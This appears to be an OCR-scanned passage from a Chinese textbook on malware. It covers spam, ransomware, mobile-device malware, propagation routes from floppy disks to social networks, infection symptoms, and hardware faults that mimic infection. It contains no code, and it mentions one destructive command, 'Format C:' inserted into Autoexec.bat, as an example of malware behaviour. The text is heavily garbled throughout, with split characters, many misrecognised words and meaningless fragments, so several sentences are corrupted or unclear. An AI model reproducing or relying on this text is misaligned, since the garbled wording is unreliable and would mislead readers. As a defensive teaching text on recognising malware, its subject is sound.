Attack Applets)、ActiveX 控件 、JavaScript、VBScript、PHP.、 Shell 语言 等 。 恶 意 脚 本 的 危 
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害 不 仅 体现 在 修改 用 户 计算 机 的 配置 方面 ,而 且 还 可 以 作为 传播 蠕虫 和 木马 等 恶意 代码 的 
工具 。 
垃圾 信息 
垃圾 信息 是 指 未 经 用 户 同 意 回 用 户 发 送 的 .用 户 不 愿意 接收 的 信息 ,或 用 户 不 能 根据 月 
己 的 意愿 拒绝 接收 的 信息 ,主要 包含 未 经 用 户 同 意向 用 户 发 送 的 商业 类 .广告 类 .违法 类 、 不 
良 信息 类 等 信息 。 
根据 垃圾 信息 传播 的 媒体 不 同 ,垃圾 信息 又 可 以 分 为 以 下 不 同 的 类 别 : 垃圾 短信 息 , 是 
指 在 手机 上 传播 的 垃圾 信息 ; 垃圾 邮件 ,是 指 通过 电子 邮件 传播 的 垃圾 信息 ; 即时 垃圾 信 
息 , 是 指 在 即时 消息 通信 工具 上 传播 的 垃圾 信息 ; 此 外 ,最 近 还 出 现 了 博客 垃圾 信息 、 搜 索 
引擎 垃圾 信息 等 概念 。 
14. 勒索 软件 
勒索 软件 是 黑客 用 来 劫持 用 户 资 产 或 资源 并 以 此 为 条 件 各 用 户 勒 案 钱 财 的 一 种 恶意 
件 。 通 常会 将 用 户 系 统 内 的 文档 、 邮 件 、 数 据 库 、 源 代码 、 图 片 、 压 缩 文件 等 多 种 文件 进行 某 
种 形式 的 加 密 操作 ,使 其 不 可 用 ,或 者 通过 修改 系统 配置 文件 干扰 用 户 正常 使 用 系统 的 方 
法 使 系统 的 可 用 性 降低 ,然后 通过 弹出 窗口 \ 对 话 框 或 生成 文本 文件 等 方式 回 用 户 发 出 勒索 
通知 ,要求 用 户 回 指定 账户 支付 赎金 来 获得 解密 文件 的 密码 或 者 获得 恢复 系统 正常 运行 的 
方法 。 
15. 移动 终端 恶意 代码 
移动 终端 (Mobile Terminal, MT) 是 指 可 以 在 移动 中 使 用 的 计算 机 设备 ,广义 地 讲 , 包 
插手 机 笔记 本 电脑 ,平板 电脑 .POS 机 甚至 包括 车 载 电 脑 。 但 是 大 部 分 情况 下 是 指 手 机 或 
者 具有 多 种 应 用 功能 的 智能 手机 以 及 平板 电脑 。 移 动 终端 可 以 在 移动 中 完成 语音 、 数 据 .图 
下 人 息 的 交换 和 表现 。 
今 为 止 ,移动 终端 恶意 代码 没有 明确 的 定义 。 在 国内 ,普遍 接受 的 手机 病毒 的 定义 
tp 样 ,以 手机 为 感染 对 象 ,以 手机 网 络 和 计算 机 网 络 为 平台 , 通 
恶意 短信 等 形式 ,对 手机 进行 攻击 ,从 而 造成 手机 异常 的 一 种 新 型 病毒 。 以 此 为 参考 ,并 
结合 恶意 代码 的 描述 ,给 出 移动 终端 恶意 代码 的 定义 为 : 移动 终端 恶意 代码 以 移动 终端 为 
感染 对 象 ,以 移动 网 络 和 计算 机 网 络 为 平台 ,通过 无 线 或 有 线 通信 等 方式 ,对 移动 终端 进行 
攻击 ,从 而 造成 移动 终端 异 背 的 各 种 不 良 程序 代码 。 


混 就 四 并 


1. > 恶 蕊 意 代 码 的 传播 途 


恶意 代码 的 传染 性 是 体现 其 生命 力 的 重要 手段 ,是 恶意 代码 赖 以 生存 和 繁殖 的 条 件 , 如 
和 东 恶 意 代 码 没有 传播 渠 让 , 则 其 破坏 性 小 ,扩散 面 军 , 难 以 造成 大 面积 流行 。 因 此 ,熟悉 恶意 
代码 的 传播 途径 将 有 助 于 防范 恶意 代码 的 传播 。 

恶意 代码 的 传播 主要 通过 文件 复制 .文件 传送 .文件 执行 等 方式 进行 ,文件 复制 与 文件 
传送 需要 传输 媒介 ,因此 ,有 恶意 代码 的 扩散 与 传输 巡 体 的 变化 有 者 直接 关系 。 通 过 认真 猎 究 
各 种 恶意 代码 的 传染 途径 ,有 的 放 和 天 地 采取 有 效 措施 ,必定 能 在 对 抗 恶意 代码 的 斗争 中 占据 
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有 利 地 位 。 恶 意 代 码 的 主要 传播 途径 有 以 下 几 种 。 
1. 软盘 


在 计算 机 产生 的 最 初 几 十 年 间 , 软 盘 作 为 最 常用 的 交换 媒介 ,对 恶意 代码 的 传播 发 挥 了 
巨大 的 作用 。 过 去 的 计算 机 应 用 比较 简单 ,可 执行 文件 和 数据 文件 系统 都 较 小 ,许多 执行 文 
件 均 通 过 软盘 相互 复制 、 安 疫 ,恶意 代码 就 能 通过 软盘 传播 文件 型 病毒 。 在 通过 软盘 引导 操 
作 系 统 时 ,引导 区 型 病毒 就 会 在 软盘 与 硬盘 引导 区 内 互相 感染 。 因 此 ,软盘 当之无愧 地 成 了 
最 早 的 恶意 代码 传播 途径 。 不 过 软盘 已 经 成 了 历史 ,当今 的 恶意 代码 不 再 采用 软盘 作为 寄 
生物 。 

2.。 光盘 

在 移动 硬盘 和 大 容量 U 盘 出 现 以 前 ,光盘 以 容量 大 著称 。 光 盘 可 以 存储 大 量 的 可 执行 
文件 ,大 量 的 恶意 代码 就 有 可 能 减 叶 于 光盘 。 由 于 技术 特点 ,大 多 数 光 盘 都 是 只 读 式 光 盘 ， 
不 能 进行 写 操作 ,因此 光盘 上 的 恶意 代码 不 能 被 有 效 清 除 。 历 史 表 明 ,盗版 光盘 (特别 是 资 
版 游戏 光盘 ) 是 恶意 代码 最 主要 的 寄生 物 。 在 以 至 利 为 目的 的 非法 盗版 软件 的 制作 过 程 中 ， 
不 可 能 为 安全 防护 担负 任何 责任 ,也 决 不 会 有 真正 可 徘 的 技术 来 保障 避免 恶意 代码 的 寄 答 。 
盗版 光盘 的 泛滥 给 恶意 代码 的 传播 融 来 了 极 大 的 便利 ,甚至 有 些 存储 在 光盘 上 的 安全 防范 
工具 本 映 就 市 有 恶意 代码 ,这 就 给 本 来 “干净 ”的 计算 机 市 来 了 灾难 。 

3. 硬盘 


便 盘 含 移动 硬盘 、`USB 便 盘 等 。 随 着 电子 技术 的 发 展 , 便 盘 逐 渐 取 代 软 盘 、 光盘 等 成 为 
数据 交换 的 主流 工具 。 携 带 恶 意 代 码 的 便 盘 在 本 地 或 移 到 其 他 地 方 使 用 其 至 维修 时 ,就 会 
使 干净 的 人 硬盘 传染 或 者 感染 其 他 便 盘 并 最 终 导致 恶意 代码 的 扩散 。 闭 名 的 “U 盘 病 毒 ” 就 
是 这 类 病毒 的 典型 代表 。 

4. Internet 

现代 通信 技术 的 巨大 进步 已 使 空间 距离 不 再 遥远 ,数据 .文件 .电子 邮件 可 以 方便 地 在 
各 个 网 络 节 点 间 通 过 电线、 光纤 或 电话 线路 进行 传送 。 节 点 的 距离 可 以 短 至 并 排 摆 放 的 计 
算 机 ,也 可 以 长 达 上 万 千 米 ,这 就 为 恶意 代码 的 传播 提供 了 新 的 媒介 。 恶 意 代 码 可 以 附着 在 
正常 文件 中 , 当 用 户 从 网 络 男 一 端 下 载 一 个 被 感染 的 程序 ,并 在 自己 的 计算 机 上 未 加 任何 防 
护 措 施 的 情况 下 运行 它 时 ,恶意 代码 就 传播 开 了 。 这 种 恶意 代码 的 传染 方式 在 计算 机 网 络 
连接 很 普及 的 国家 是 很 常见 的 ,国内 计算 机 感染 一 些 “ 进 口 ” 恶 意 代码 已 不 再 是 什么 大 惊 小 
怪 的 事 了 。 在 信息 国际 化 的 同时 ,恶意 代码 也 在 国际 化 。 大 量 的 国外 恶意 代码 随 着 互联 网 
络 传人 国内 。 

Internet 的 快速 发 展 促进 了 以 有 线 网 络 为 媒介 的 各 种 服务 (FTP、WWW.、BBS、 E-mail 
等 ) 的 快速 普及 。 同 时 ,这 些 服务 也 成 为 了 新 的 恶意 代码 传播 方式 。 

(1) 电子 公告 栏 (BBS): BBS 是 由 计算 机 爱好 者 自发 组 织 的 通信 站 点 ,用 户 可 以 在 BBS 
上 进行 文件 交换 (包括 自由 软件 、 游 戏 、 自 编程 序 )。 由 于 大 多 数 BBS 网 站 没有 严格 的 安全 
管理 ,也 无 任何 限制 ,这样 就 给 一 些 恶 意 代 码 编写 者 提供 了 传播 的 场所 。 

(2) 电子 邮件 (E-mail) : 恶意 代码 主要 以 电子 邮件 附件 的 形式 进行 传播 ,由 于 人 们 可 以 
通过 电子 邮件 发 送 任何 类 型 的 文件 ,而 大 部 分 恶意 代码 的 防护 软件 在 这 方面 的 功能 还 不 是 
十 分 完善 ,使 得 电子 邮件 成 为 传播 恶意 代码 的 主要 媒介 。 
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(3) 社交 网 络 : 随 着 Web 2.0 时 代 的 到 来 ,传统 的 即时 消息 服务 如 QQ 在 线 相 册 等 纷 
纷 加 社交 网 络 服 务 转 型 ,也 催生 了 人 微 信 、 新 浪人 微 博 、Facebook、 Instagram、Twitter、 
YouTube、LinkedIn 等 更 多 形式 的 社交 网 络 服务 。 同 时 ,社交 网 络 的 作用 不 再 仅仅 是 社交 ， 
也 成 为 各 种 规模 企业 的 通用 沟通 工具 。 事 实 上 ,有 大 量 企业 依靠 社交 和 视频 网 站 来 开展 各 
种 商业 服务 ,如 客户 沟通 、 视 频 培 训 、 新 闻 和 广告 发 布 等 。 由 于 社交 网 络 的 交互 功能 和 用 户 
依赖 性 ,使 得 社交 网 络 也 巨 速成 为 恶意 代码 传播 的 一 个 重要 渠道 。 据 统计 , 仅 在 2010 年 ， 
30% 的 中 小 型 企业 都 受到 过 通过 社交 网 络 而 传播 的 恶意 软件 的 感染 。 

(4) Web 服务 : Web 网 站 在 传播 有 益 信息 的 同时 ,也 成 为 传播 不 良 信 息 的 最 重要 的 途 
径 。 恶 意 脚本 被 广泛 用 来 编制 恶意 攻击 程序 ,它们 主要 通过 Web 网 站 传播 ; 不 法 分 子 或 好 
事 之 徒 制 作 的 匿名 个 人 网 页 直接 提供 了 下 载 大 批 恶 意 代码 活 样本 的 便利 途径 ; 用 于 学 术 研 
究 的 样本 提供 机 构 ,专门 关 于 恶意 代码 制作 、 人 研究 和 讨论 的 学 术 性 质 的 电子 论文 .期 刊 、 杂 志 
及 相关 的 网 上 学 术 交 流 活动 等 ,都 有 可 能 成 为 国内 外 任何 想 成 为 新 的 恶意 代码 制造 者 学 习 、 
借鉴 次 用、 抄袭 的 目标 与 对 象 ; 散布 于 网 站 上 的 大 批 恶 意 代码 制作 工具 、 向 导 、 程 序 等 ,使 
得 无 编程 经 验 和 基础 者 制造 新 恶意 代码 成 为 可 能 。 

(5) FTP 服务 : 通过 这 个 服务 ,可 以 将 文件 放 在 世界 上 的 任何 一 台 计 算 机 上 ,或 者 从 远 
程 计算 机 复制 到 本 地 计算 机 上 。 这 在 很 大 程度 上 方便 了 学 习 和 交流 ,使 互联 网 上 的 资源 得 
到 最 大 限度 的 共享 。FTP 能 传播 现 有 的 所 有 恶意 代码 ,所 以 在 使 用 时 就 更 要 注意 安全 

(6) 新 闻 组 (News) : 通过 这 种 服务 ,用户 可 以 与 世界 上 的 任何 人 讨论 某 个 话题 ,或 选择 
接收 感 兴趣 的 有 关 新 闻 邮 件 。 这 些 信息 中 包含 的 附件 有 可 能 使 计算 机 感染 恶意 代码 。 

5. 无 线 通信 系统 


无 线 网 络 已 经 越 来 越 普 及 ,但 早期 很 少 有 无 线装 置 拥 有 安全 防范 功能 。 由 于 有 更 多 手 
机 通过 无 线 通信 系统 和 互联 网 连接 ,手机 已 成 为 恶意 代码 的 一 个 主要 攻击 目标 。 在 手机 系 
统 中 ,恶意 代码 一 旦 发 作 ,手机 就 会 出 现 故障 或 丢失 信息 。 

恶意 代码 对 手机 的 攻击 有 3 个 层次 : 攻击 WAP 服务 器 ,使 手机 无 法 访问 服务 器 ; 攻击 
网 关 ,向 手机 用 户 发 送 大 量 垃 圾 信息 ; 直接 对 手机 本 身 进 行 攻击 ,有 针对 性 地 对 其 操作 系统 
和 运行 程序 进行 攻击 ,使 手机 无 法 提供 服务 或 提供 非法 服务 。 

上 面 讨 论 了 恶意 代码 的 传染 渠道 , 随 着 各 种 反 恶 意 代 码 技 术 的 发 展 和 人 们 对 恶意 代 
码 的 了 解 越 来 越 深 入 ,通过 对 各 条 传播 途径 的 严格 控制 ,来 自 恶 意 代 码 的 侵扰 会 越 来 
越 少 。 


1.6 感染 恶意 代码 的 症状 


恶意 代码 入 侵 计算 机 系统 后 ,会 使 计算 机 系统 的 菜 些 部 分 发 生变 化 ,引发 一 些 异 常 现 
象 , 用 户 可 以 根据 这 些 异 常 现象 来 判断 是 否 有 恶意 代码 的 存在 。 恶 意 代码 的 种 类 桶 多 ,入 侵 
后 引发 的 异常 现象 也 是 千奇百怪 ,因此 不 可 能 一 一 列举 。 概 括 地 说 ,可 以 从 屏幕 显示 、 系 统 
声音 、 系 统 工作 .键盘 .打印 机 、 文 件 系统 等 几 个 方面 探查 异常 现象 。 
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1.6.1 有 恶意 代码 的 表现 现象 


根据 恶意 代码 感染 和 发 作 的 阶段 ,可 以 将 恶意 代码 的 表现 现象 分 为 三 大 类 , 即 恶 意 代码 
发 作 前 、 发 作 时 和 发 作 后 的 表现 现象 。 

1. 恶意 代码 发 作 前 的 表现 现象 

恶意 代码 发 作 前 是 指 从 恶意 代码 感染 计算 机 系统 ,潜伏 在 系统 内 开始 ,一 直到 激发 条 件 
满足 ,恶意 代码 发 作 之 前 的 一 个 阶段 。 在 这 个 阶段 ,恶意 代码 的 行为 主要 是 以 潜伏 .传播 为 
主 。 恶 意 代 码 会 以 各 式 各 样 的 手法 来 隐藏 目 己 ,在 不 被 发 现 的 同时 ,以 各 种 手段 进行 传播 。 
以 下 是 一 些 恶 意 代码 发 作 前 常见 的 表现 现象 。 

(1) 耻 生 人 发 来 的 电子 邮件 。 收 到 陌生 人 发 来 的 电子 邮件 ,尤其 是 市 附件 的 电子 邮件 ， 
有 可 能 携带 恶意 代码 。 这 类 恶意 代码 通常 表现 为 通过 电子 邮件 传播 的 蠕虫 。 

(2) 磁盘 空间 迅速 减少 。 一 是 没有 安装 新 的 应 用 程序 ,而 系统 可 用 的 磁盘 空间 下 降 得 
很 快 ,这 可 能 是 恶意 代码 感染 造成 的 。 二 是 经 第 浏览 网 页 、 回 收 站 中 的 文件 过 多 ,临时 文件 
夹 下 的 文件 数量 过 多 过 大 等 情况 下 也 可 能 会 造成 可 用 的 磁盘 空间 迅速 减少 ,这 种 情况 是 
Windows 内 存 交 换文 件 (pagefile. sys) 的 增多 。 三 是 Windows 系统 中 内 存 交 换文 件 会 随 着 
应 用 程序 运行 的 时 间 和 进程 的 数量 增加 而 增长 ,一 般 不 会 减少 ,而 且 同 时 运行 的 应 用 程序 数 
量 越 多 , 内存 交换 文件 就 越 大 ,这 种 情况 是 Windows 系统 的 休眠 信息 保存 文件 (hiberfil. 
sys) 的 增加 。 该 文件 的 大 小 始终 和 物理 内 存 大 小 一 致 ,系统 休眠 时 将 内 存 中 的 所 有 信息 保 
存 到 这 个 文件 中 。 

(3) 平时 正常 的 计算 机 经 党 突然 死机 。 恶 意 代码 感染 了 计算 机 系统 后 ,将 自 号 驻 留 在 
系统 内 并 修改 了 核心 程序 或 数据 ,引起 系统 工作 不 稳定 ,造成 死机 现象 。 

(4) 无 法 正常 局 动 操 作 系 统 。 关 机 后 再 启动 ,操作 系统 报告 缺少 必要 的 启动 文件 ,或 局 
动 文件 被 破坏 ,系统 无 法 启动 。 这 很 可 能 是 恶意 代码 感染 系统 文件 后 使 得 文件 结构 发 生变 
化 ,无 法 被 操作 系统 加 载 . 引导。 

(5) 计算 机 运行 速度 明显 变 慢 。 在 硬件 设备 没有 损坏 或 更 换 的 情况 下 ,本 来 运行 速度 
很 快 的 计算 机 ,运行 同样 的 应 用 程序 时 ,速度 明显 变 慢 ,而 且 重 局 后 依然 很 慢 。 这 很 可 能 是 
恶意 代码 占用 了 大 量 的 系统 资源 ,并 且 其 上 月 身 的 运行 占用 了 大 量 的 处 理 硕 时 间 ,造成 系统 资 
源 不 足 ,运行 变 慢 。 

(6) 部 分 软件 经 营 出 现 内 存 不 足 的 错误 。 某 个 以 前 能 够 正常 运行 的 程 厅 在 启动 的 时 候 
显示 系统 内 存 不 足 或 者 使 用 其 某 个 功能 时 显示 内 存 不 足 。 这 可 能 是 恶意 代码 驻 留 后 占用 了 
系统 中 大 量 的 内 存 空间 ,使 得 可 用 内 存 空间 减 小 。 随 着 恶意 代码 技术 的 改进 以 及 硬件 的 发 
展 , 导 致 内 存 不 足 现象 出 现 的 恶意 代码 明显 减少 。 

(7) 以 前 能 正常 运行 的 应 用 程序 经 稼 发 生死 机 或 者 非法 错误 。 在 硬件 和 操作 系统 没有 
进行 改动 的 情况 下 ,以 前 能 够 正常 运行 的 应 用 程序 产生 非法 错误 和 死机 的 情况 明显 增加 。 
这 可 能 是 由 于 恶意 代码 感染 应 用 程序 后 破坏 了 应 用 程序 本 身 的 正常 功能 ,或 者 恶意 代码 本 
号 存在 着 兼容 性 方面 的 问题 造成 的 。 

(8) 系统 文件 的 属性 发 生变 化 。 系 统 文件 的 执行 . 读 写 、. 时 间 .日 期 ,大 小 等 属性 发 生变 化 
是 最 明显 的 恶意 代码 感染 迹象 。 恶 意 代码 感染 答 主 程序 文件 后 ,会 将 日 喘 插入 其 中 ,文件 大 小 
一 般 会 有 所 增加 ,文件 的 访问 .修改 日 期 及 时 间 也 可 能 会 被 改 成 感染 时 的 时 间 。 尤 其 是 对 那些 
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系统 文件 , 绝 大 多 数 情 况 下 是 不 会 修改 它们 的 ,除非 是 进行 系统 升级 或 打 补 丁 。 对 应 用 程序 使 
用 的 数据 文件 ,文件 大 小 和 修改 日 期 .时 间 是 可 能 会 改变 的 ,并 不 一 定 是 恶意 代码 在 作怪 。 

(9) 系统 无 故 对 磁盘 进行 写 操 作 。 用 户 没 有 要 求 进行 任何 读 、 写 磁盘 的 操作 ,操作 系统 
却 提示 读 写 磁盘 。 这 很 可 能 是 恶意 代码 自动 查找 磁盘 状态 的 时 候 引 起 的 系统 异常 。 需 要 注 
意 的 是 ,有 些 编辑 软件 会 自动 进行 存盘 操作 。 

(10) 网 络 驱 动 右 卷 或 共享 目录 无 法 调用 。 对 于 有 读 权 限 的 网 络 驱 动 右 卷 、 共 享 目 录 等 
无 法 打开 浏览 ,或 者 对 有 写 权 限 的 网 络 驱 动 器 卷 .共享 目录 等 无 法 创建 ,修改 文件 。 虽 然 目 
前 还 很 少 有 纯粹 地 针对 网 络 驱 动 硕 卷 和 共享 目录 的 恶意 代码 ,但 恶意 代码 的 某 些 行为 可 能 
会 影响 对 网 络 驱 动 硕 卷 和 共享 目录 的 正 稼 访问 。 

2. 恶意 代码 发 作 时 的 表现 现象 

恶意 代码 发 作 时 的 表现 现象 是 指 满足 恶意 代码 发 作 的 条 件 ,进入 进行 破坏 活动 的 阶段 。 
恶意 代码 发 作 时 的 表现 大 都 各 不 相同 ,可 以 说 一 百 个 恶意 代码 发 作 有 一 百 种 花样 。 这 与 恶 
意 代 码 制造 者 的 心态 .所 采用 的 技术 手段 等 都 有 密切 的 关系 。 以 下 列举 了 一 些 恶意 代码 发 
作 时 向 见 的 表现 现象 。 

(1) 硬盘 灯 持 续 闪 烁 。 硬 盘 灯 闪烁 说 明 硬 盘 正 在 进行 读 写 操作 。 当 对 硬盘 有 持续 、 大 
量 的 操作 时 ,人 硬盘 的 灯 就 会 不 断 闪 烁 。 有 的 恶意 代码 会 在 发 作 的 时 候 对 硬盘 进行 格式 化 ,或 
者 写 和 许多 垃圾 文件 ,或 反复 读 取 某 个 文件 ,致使 硬盘 上 的 数据 损坏 。 具 有 这 类 发 作 现象 的 
恶意 代码 破坏 性 非常 强 。 

(2) 无 故 播 放 音 乐 。 恶 作 剧 式 的 恶意 代码 ,最 著名 的 是 " 扬 基 ”(Yangkee) 和 ”浏阳 河 ” 
等 。 扬 基 发 作 时 利用 计算 机 内 置 的 扬 声 需 演 奏 《 扬 基 》 音 乐 。 "浏阳 河 ? 发 作 时 ,各 系统 时 钟 
为 9 月 9 日 则 演奏 歌曲 4 浏阳 河 》, 奉 当 系 统 时 钟 为 12 月 26 日 则 演 舌 《东方 红 ) 的 旋律 。 这 
类 恶意 代码 的 破坏 性 较 小 ,它们 只 是 在 发 作 时 播放 音乐 并 占用 处 理 带 资源 。 

(3) 不 相干 的 提示 。 宏 病毒 和 DOS 时 期 的 病毒 最 常见 的 发 作 现 象 是 出 现 一 些 不 相干 
的 提示 文字 ,例如 打开 感染 了 宏 病 毒 的 Word 文档 ,如 果 满 足 发 作 条 件 , 系 统 就 会 弹出 对 话 
框 显 示 “ 这 个 世界 太 黑 上 暗 了 !1”, 并 且 要 求 用 户 输 入 “ 太 正 确 了 ”后 单 击 “确定 ”按钮 。 

(4) 无 故 出 现 特定 图 像 。 此 类 恶作剧 式 的 恶意 代码 ,如 小 球 病毒 ,发 作 时 会 从 屏幕 上 方 
不 断 掉 落 小 球 图 像 。 单 纯 产 生 图 像 的 恶意 代码 破坏 性 也 较 小 ,只 是 在 发 作 时 破坏 用 户 的 显 
示 界 面 ,干扰 用 户 的 正常 工作 。 

(5) 突然 出 现 算 法 游戏 。 有 些 恶作剧 式 的 恶意 代码 发 作 时 执行 某 些 算法 简单 的 游戏 来 
中 断 用 户 的 工作 ,一定 要 玩 局 了 才 让 用 户 继续 他 的 工作 。 例 如 ,曾经 流行 一 时 的 ”人 台湾 一 号 ” 
宏 病 毒 ,在 系统 日 期 为 13 日 时 发 作 , 弹 出 对 话 框 ,要 求 用 户 做 算术 题 。 

(6) 改变 Windows 果 面 图 标 。 这 也 是 恶作剧 式 的 恶意 代码 发 作 时 的 典型 表现 现象 。 
把 Windows 默认 的 图 标 改 成 其 他 样式 的 图 标 ,或 者 将 其 他 应 用 程序 .快捷 方式 的 图 标 改 成 
Windows 默认 图 标 样式 ,起 到 迷惑 用 户 的 作用 。 著 名 的 熊猫 烧香 病毒 就 会 把 系统 的 默认 图 
标 修改 为 烧香 的 熊猫 。 

(7) 计算 机 突然 死机 或 重启 。 有 些 恶 意 代码 在 兼容 性 上 存在 问题 ,代码 没有 严格 测试 ， 
在 发 作 时 会 造成 意 想 不 到 的 情况 ; 或 者 是 恶意 代码 在 Autoexec. bat 文件 中 添加 了 一 句 
“Format C: ”之 类 的 语句 ,需要 系统 重启 后 才能 实施 破坏 。 

(8) 自动 发 送 电 子 邮件 。 大 多 数 电 子 邮件 恶意 代码 都 采用 自动 发 送 电 子 邮件 的 方法 作 


18 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


为 传播 的 手段 ,也 有 的 电子 邮件 恶意 代码 在 茶 一 特定 时 刻 加 同一 个 邮件 服务 硕 发 送 大 量 无 
用 的 信件 ,以 达到 阻塞 该 邮件 服务 器 正常 服务 功能 的 目的 。 利 用 邮件 引擎 传播 的 蠕虫 具有 

(9) 鼠标 指针 无 故 移动 。 没 有 对 计算 机 进行 任何 操作 ,也 没有 运行 任何 演示 程序 、 屏 舌 
保护 程序 等 ,而 屏 人 帮 上 的 鼠标 指针 日 己 在 移动 ,好 像 应 用 程序 日 己 在 运行 ,被 遥控 似 的 。 有 
些 特 洛 伊 木 马 在 远程 控制 时 会 产生 这 种 现象 。 

需要 指出 的 是 ,上 述 现 象 有 些 是 恶意 代码 发 作 的 明显 现象 ,如 出 现 一 些 不 相干 的 话 、 播 
放 音 乐 或 者 显示 特定 的 图 像 等 。 有 些 现象 则 很 难 直 接 判 定 是 否 为 恶意 代码 在 作怪 ,如 硬盘 
灯 不 断 闪烁 ,在 同时 运行 多 个 占用 内 存 较 大 的 应 用 程序 ,而 计算 机 本 身 性 能 又 相对 较 弱 的 情 
况 下 ,局 动 和 切换 应 用 程序 的 时 候 也 会 使 硬盘 不 停 地 工作 ,出现 人 硬盘 灯 不 断 闪烁 的 现象 。 

3. 恶意 代码 发 作 后 的 表现 现象 


通常 情况 下 ,恶意 代码 发 作 会 给 计算 机 系统 带 来 破坏 性 后 果 。 大 多 数 恶 意 代码 都 属于 
恶性 的 。 恶 性 的 恶意 代码 发 作 后 往往 会 带 来 很 大 的 损失 ,以 下 列举 了 一 些 恶 性 的 恶意 代码 
发 作 后 所 造成 的 后 果 。 

(1) 无 法 启动 系统 。 恶 意 代 码 破 坏 了 硬盘 的 引导 肩 区 后 ,就 无 法 从 硬盘 启动 计算 机 系 
统 了 。 有 些 恶意 代码 修改 了 硬盘 的 关键 内 容 (如 文件 分 配 表 . 根 目录 区 等 ) ,使 得 原先 保存 在 
硬盘 上 的 数据 几乎 完全 丢失 。 

(2) 系统 文件 丢失 或 被 破坏 。 通 和 常 系统 文件 是 不 会 被 删除 或 修改 的 ,除非 计算 机 操作 
系统 进行 了 升级 。 但 是 某 些 恶意 代码 发 作 时 删除 了 系统 文件 ,或 者 破坏 了 系统 文件 ,使 得 以 
后 无 法 正常 启动 计算 机 系统 。 

(3) 部 分 BIOS 程序 混乱 。 类 似 于 CIH 病毒 发 作 后 的 现象 ,系统 主板 上 的 BIOS 被 恶 
意 代 码 改 写 .破坏 ,使 得 系统 主板 无 法 正常 工作 ,从 而 使 计算 机 系统 的 部 分 元 器 件 报废 。 

(4) 部 分 文档 丢失 或 被 破坏 。 类 似 于 系统 文件 的 丢失 或 被 破坏 ,有 些 恶意 代码 在 发 作 
时 会 删除 或 破坏 硬盘 上 的 文档 ,造成 数据 丢失 。 

(5) 部 分 文档 自动 加 密 。 有 些 恶 意 代 码 利用 加 密 算 法 ,对 被 感染 的 文件 进行 加 密 ,并 将 
加 密 密 钥 保存 在 恶意 代码 程序 体内 或 其 他 隐蔽 的 地 方 , 如 果 内 存 中 驻 留 了 这 种 恶意 代码 , 那 
么 在 系统 访问 被 感染 的 文件 时 它 自动 将 文件 解密 ,使 得 用 户 察觉 不 到 文件 曾 被 加 密 过 。 一 
旦 这 种 恶意 代码 被 清除 ,那么 被 加 密 的 文件 就 很 难 被 恢复 了 。 

(6) 目录 结构 发 生 混 乱 。 目 录 结 构 发 生 混乱 有 两 种 情况 。 一 种 是 目录 结构 确实 受到 破 
坏 , 目 录 扇 区 作为 普通 扇 区 使 用 而 被 填写 一 些 无 意义 的 数据 ,再 也 无 法 恢复 。 另 一 种 情况 是 
真正 的 目录 户 区 被 转移 到 人 硬盘 的 其 他 户 区 中 ,只 要 内 存 中 存在 该 恶意 代码 , 它 就 能 够 将 正确 
的 目录 户 区 读 出 ,并 在 应 用 程序 需要 访问 该 目录 的 时 候 提 供 正 确 的 目录 项 ,使 得 从 表面 上 看 
与 正常 情况 没有 两 样 。 

(7) 网 络 无 法 提供 正常 服务 。 有 些 恶 意 代 码 会 利用 网 络 协议 的 弱点 进行 破坏 ,使 网 络 
无 法 正常 使 用 。 这 类 恶意 代码 的 典型 代表 是 ARP 型 的 恶意 代码 。ARP 恶意 代码 会 修改 本 
地 计算 机 的 MAC-IP 对 照 表 ,使 得 数据 链 路 层 的 通信 无 法 正常 进行 。 

(8) Ce 当 用 户 的 计算 机 被 恶意 脚本 破坏 后 ,恶意 脚本 往往 会 
修改 浏览 器 的 配置 。 恶意 代码 的 典型 代表 是 “万 花 简 ”病毒 ,该 病毒 会 让 用 户 的 计算 机 
pene 
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1.6.2 与 恶意 代码 现象 类 似 的 硬件 故障 


硬件 的 故障 范围 不 太 广 泛 ,也 很 容易 被 确认 。 在 识别 和 处 理 计算 机 的 异常 现象 时 ,硬件 
故障 很 容易 被 忽略 ,但 只 有 先 排除 硬件 故障 , 才 是 解决 问题 的 根本 。 

1. 硬件 配置 问题 

这 种 故障 常 发 生 在 兼容 机 上 。 巾 于 配件 的 不 完全 兼容 ,导致 一 些 软件 不 能 正常 运行 。 
因此 ,用户 在 组 装 计算 机 时 应 首先 考虑 配件 的 兼容 性 。 

2. 电源 电压 不 稳定 

右 计 算 机 所 使 用 的 电源 电压 不 稳定 ,容易 导致 用 户 文件 在 磁盘 读 写 时 出 现 丢 失 或 被 破 
坏 的 现象 ,严重 时 将 会 引起 系统 自 启动 。 如 果 用 户 所 用 的 电源 电压 经 常 出 现 不 稳定 的 情况 ， 
建议 使 用 电源 稳 压 颖 或 不 间断 电源 (UPS)， 

3. 接触 不 良 

计算 机 插件 和 插 槽 之 间接 触 不 良 ,会 使 某 些 设备 出 现时 好 时 坏 的 现象 。 例 如 ,显示 器 的 
数据 线 与 主机 接触 不 良 时 可 能 会 使 显示 器 显示 不 稳定 ,磁盘 线 与 多 功能 卡 接触 不 良 时 会 导 
致 磁盘 读 写 时 好 时 坏 ,打印 机 电缆 与 主机 接触 不 良 时 会 造成 打印 机 不 工作 或 工作 现象 不 正 
常 , 和 鼠标 线 与 串 行 接 口 接触 不 良 时 会 出 现 鼠 标 指针 时 动 时 不 动 的 故障 等 。 

4. 驱动 器 故障 

用 户 如 宁 使 用 质量 低劣 的 磁 ( 光 ) 盘 或 使 用 损坏 的 .发霉 的 磁 ( 光 ) 盘 ,会 把 驱动 融 弄 脏 ， 
出 现 无 法 读 写 磁 ( 光 ) 盘 或 读 写 出 错 等 故障 。 遇 到 这 种 情况 时 ,只 需 用 清洗 盘 清洗 读 写 头 , 即 
可 排除 故障 。 

5. CMOS 的 问题 

CMOS 存储 的 信息 对 计算 机 系统 来 说 是 十 分 重要 的 。 在 计算 机 局 动 时 总 是 先 按 
CMOS 中 的 信息 来 检测 和 初始 化 系统 。 在 较 旧 的 主板 中 ,大 都 有 一 个 病毒 监测 开关 ,用 户 
一 般 情 况 下 都 设置 为 ON, 这 时 如 果 安 装 某 些 系 统 ,就 会 发 生死 机 现象 。 用 户 在 安装 新 系统 
时 ,应 先 把 CMOS 中 病毒 监测 开关 设 为 “OFF”。 另 外 ,系统 的 引导 速度 和 一 些 程序 的 运行 
速度 减 慢 也 可 能 与 CMOS 有 关 , 因 为 CMOS 的 高 级 设置 中 有 一 些 影 子 内 存 开 关 , 这 些 也 会 
影响 系统 的 运行 速度 。 


